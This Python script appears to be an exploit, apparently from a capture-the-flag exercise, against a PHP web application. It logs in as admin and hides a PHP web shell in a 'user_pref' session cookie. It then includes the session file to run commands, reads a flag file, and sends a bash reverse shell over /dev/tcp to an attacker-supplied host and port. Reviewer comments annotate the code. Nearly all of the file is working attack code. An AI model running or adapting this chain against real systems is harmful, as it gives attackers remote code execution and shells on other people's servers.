#!/usr/bin/env python3
import requests
import time
import os
import sys
import argparse
# User Arguments
# Command-line interface: all three flags are required, so a run without them
# exits with argparse's usage error before any request is made.
parser = argparse.ArgumentParser()
# NOTE(review): the f-prefix on the three help strings has no placeholders.
parser.add_argument('-u','--url', type=str,help=f'URL of the vulnerable application',required=True)
parser.add_argument('-lh','--lhost', type=str,help=f'LHOST IP on which the reverse shell will be sent',required=True)
parser.add_argument('-lp','--lport', type=int,help=f'LPORT on which the reverse shell will be sent',required=True)
args = parser.parse_args()
# Setting argumented variable
# Module-level globals read by search() and login() below.
BASE_URL = args.url
LHOST = args.lhost
LPORT = int(args.lport)  # already an int via type=int above; the cast is a no-op
# Basic session for working exploitation
# Shared session: retains the cookies set by /authenticate.php so login() can
# read PHPSESSID back out of s.cookies.
s = requests.Session()
def search(cookie: dict[str, str], phpsess: str) -> None:
    """Run two commands through the poisoned session file, then hand off to a listener.

    Every POST to /home.php here carries the same two fields: ``search`` names
    this session's PHP session file on the server, and ``c`` is the command
    that the PHP fragment stored in the ``user_pref`` cookie (built in login())
    hands to system().  Presumably /home.php includes the path given in
    ``search``; the server side is not visible from this script.

    Args:
        cookie: PHPSESSID plus the ``user_pref`` cookie holding the PHP fragment.
        phpsess: The PHPSESSID value, used to build the session-file path.

    Raises:
        IndexError: if the second response does not contain the ``:"`` / ``";``
            delimiters the flag extraction splits on.
        requests.exceptions.RequestException: on any failed request, including a
            ProxyError when nothing listens on the hard-coded proxy address.
    """
    dataReq = {'search': f'/var/lib/php/sessions/sess_{phpsess}', 'c':'cat /tmp/flag.txt' }
    print('[+] Payload sent')
    requests.post(BASE_URL + '/home.php' , cookies=cookie, data=dataReq) # Dummy request to change the value of the cookie
    time.sleep(1) # sleep for waiting for the update change
    # NOTE(review): only the next request is routed through the local
    # intercepting proxy on 127.1:8080; the first and last POST in this
    # function are sent directly, which is inconsistent.
    proxy = {'http':'http://127.1:8080','https':'http://127.1:8080'}
    searchReq = requests.post(BASE_URL + '/home.php' , cookies=cookie, data=dataReq , proxies=proxy)
    print('[+] Retrieving flag')
    # Fragile positional parse of the response body: assumes the flag is the
    # third ':"'-delimited field and ends at '";'.  Any other body shape
    # raises IndexError.
    flag = searchReq.text.split(':"')[2].split('";')[0]
    print('[*] FLAG => ' + flag)
    print('[+] Starting process of getting a reverse shell')
    # Same mechanism, different command: an interactive bash connected back to
    # LHOST:LPORT via /dev/tcp.
    dataRev = {'search': f'/var/lib/php/sessions/sess_{phpsess}', 'c': f'bash -c "bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1"' }
    print(f'[-] (LISTENER)=> Run # nc -lnvp {LPORT}')
    input('[*] Press Enter to get reverse shell')
    print('[++++++++] Reverse shell sent check Listener')
    # Sent through the shared session this time, unlike the two bare
    # requests.post calls above.
    s.post(BASE_URL + '/home.php' , cookies=cookie , data=dataRev)
def login() -> None:
    """Authenticate as admin, then poison the session cookie and call search().

    Redirects are disabled, and a response with an empty body is taken as a
    successful login; on any other response the function returns silently
    with no output.  On success the server-issued PHPSESSID is reused together
    with a ``user_pref`` cookie whose value is a PHP fragment (``;`` and ``?``
    URL-encoded, spaces as ``+``) that passes ``$_REQUEST['c']`` to system().
    This relies on the application writing the raw cookie value into the PHP
    session file — that server-side behaviour is not visible here.
    """
    print('[+] Trying to Login %s' % (BASE_URL))
    # 64 hex characters where a password is expected — presumably the client
    # is expected to send an already-hashed credential; cannot tell from here.
    loginparams = {'username':'admin','password':'8C6976E5B5410415BDE908BD4DEE15DFB167A9C873FC4BB8A81F6F2AB448A918'}
    loginReq = s.post(BASE_URL + '/authenticate.php' , data=loginparams , allow_redirects=False)
    if loginReq.text == '':
        print('[+] Login Successfully')
        # NOTE(review): recovers the session id by stringifying the cookie dict
        # and splitting on quotes, so it depends on the dict's repr and key
        # order; s.cookies.get('PHPSESSID') would read the value directly.
        phpsessid = str(s.cookies.get_dict()).split("'")[3]
        print('[+] PHP session cookie: ' + phpsessid)
        cookies = {'PHPSESSID':phpsessid , 'user_pref':"<?php+system($_REQUEST['c'])%3b+%3f>"}
        search(cookies , phpsessid)
def main() -> None:
    """Entry point: delegate to login(), which drives the rest of the chain."""
    # Calls our system here
    # NOTE(review): these global declarations are unnecessary — main() neither
    # assigns to nor reads BASE_URL, LHOST or LPORT.
    global BASE_URL
    global LHOST
    global LPORT
    login()
# Script guard so an import does not start the chain; note that argument
# parsing above still runs at import time.
if __name__ == '__main__':
    main()